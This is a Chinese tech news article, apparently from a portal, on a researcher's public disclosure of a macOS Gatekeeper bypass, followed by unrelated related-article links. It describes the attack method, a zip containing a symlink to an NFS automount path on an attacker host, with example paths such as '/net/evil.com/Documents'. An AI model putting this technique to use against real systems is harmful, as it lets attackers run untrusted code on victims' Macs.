vivo手机数据连不上没办法上网怎么办
研究人员称:macOSGatekeeper安全机制中存在大漏洞
原标题:研究人员称:macOS Gatekeeper安全机制中存在大漏洞
引述外媒报道,安全研究员Filippo Cavallarin已经公开了他所说的绕过macOS的Gatekeeper安全功能的方法。截至上周发布的macOS 10.14.5版本,苹果仍然没有解决旁路问题。
Gatekeeper是一种macOS安全工具,可在下载后立即验证应用程序。这可以防止应用程序在未经用户同意的情 当用户从Mac App Store外部下载应用程序时,Gatekeeper用于检查代码是否已由Apple签名。如果代码尚未签名,则在用户未授予权限的情况下,该应用程序将无法打开。
然而,Cavallarin 在他的博客上写道,Gatekeeper的功能可以被完全绕过。在当前的实现中,Gatekeeper将外部驱动器和网络共享视为“安全位置”。这意味着它允许运行这些位置中包含的任何应用程序而无需再次检查代码。他接着解释说,用户可以“轻易”欺骗安装网络共享驱动器,然后该文件夹中的任何内容都可以通过Gatekeeper。
安全研究员解释说:
第一个合法的功能是automount(aka autofs),它允许用户仅通过访问“特殊”路径(在这种情况下,以“/ net /”开头的任何路径)自动挂载网络共享。
例如,'ls /net/evil-attacker.com/sharedfolder/'将使os使用NFS读取远程主机(evil-attacker.com)上'sharedfolder'的内容。
第二个合法的功能是zip存档可以包含指向任意位置(包括automount enpoints)的符号链接,并且MacOS上负责解压缩zip文件的软件在创建它们之前不会对符号链接执行任何检查。
这是如何工作的一个例子:
为了更好地理解此漏洞利用的工作原理,让我们考虑以下场景:攻击者制作一个zip文件,其中包含一个指向她/他控制的automount端点的符号链接(来自Documents - > /net/evil.com/Documents)并将其发送到受害者。
受害者下载恶意档案,提取并遵循符号链接。
现在,受害者位于受攻击者控制但受Gatekeeper信任的位置,因此任何攻击者控制的可执行文件都可以在没有任何警告的情况下运行。设计Finder的方式(隐藏.app扩展,隐藏标题栏的完整路径)使得这个技术非常有效且难以发现。
Cavallarin表示,他于2月22日向Apple通报了这一漏洞,该公司应该在上周发布macOS 10.14.5时解决这个问题。然而,截至该版本,该漏洞仍未得到解决,Cavallarin称Apple已停止回复他的电子邮件。他正在宣传这个缺陷,因为他给苹果公司提供了90天的窗口。
显示全文
相关文章
-
-
在寻找深圳最后一台途歌时,我们走进了一个破旧院子
-
天猫苏宁等电商平台iPhoneXS/XSMax再降价
-
小程序浪潮下,刚刚换帅的“今日头条”还会有机会么?
-
共享经济、短视频、新零售、AI:寻觅2019年新经济未来走向
-
满足高性能计算需求,提供多样化使用模式青云QingCloudEHPC为云上创新加速
-
数字人民币APP上架数天市场反响强烈
-
行业“寒潮”来临:BAT全面收紧,滴滴高管集体不拿年终奖
-
电脑上的所有软件都打不开怎么办
-
【虎嗅早报】瑞幸咖啡发行价定为15~17美元;库克:巴菲特深知苹果不是单纯的科技公司
-
总在论坛做手机的黄章最后还是跑到微博上玩起了调研
-
数字电视怎样接收地面波电视信号
-
彭博商业周刊:无人监管的比特币ATM机或将成为洗钱工具
-
原来在大家心中,最差快递公司非他莫属!
-
就在今天,支付宝突然宣布这个消息!10亿支付宝用户都沸腾了!
-
提升“算法素养” 加强透明监管
-
为什么微信支付让人觉得更不安全?
-
“彩色世界”体育版块继续起航,国际球星比利亚课程视频拍摄完毕
-
宣战支付宝微信!银联手机闪付颠覆性营销太强了,成用户收割机!
-
这个场景支付宝又碾压了微信的野心落败全因少了一样武器
-
做图片社交的都失败了,但微博做绿洲未必不行
-
阿拉丁发布小程序4月榜单:小程序悄然改变搜索市场,电商类连续两月TOP第一
-
网易云音乐8亿用户的背后,危机四伏!
-
马云这话针对雷军?“风过去了,摔死的都是猪”
-
ofo戴威被限制消费,支付宝用户中774万大奖,淘宝b站展开合作!
-
一周时间,如何摸清一个行业
-
“丰巢困局”揭露的商业真相
-
【阿里回应印度前雇员起诉:政策符合当地法律案件还在审判中】
-
绝路之后,人人网还有三条去路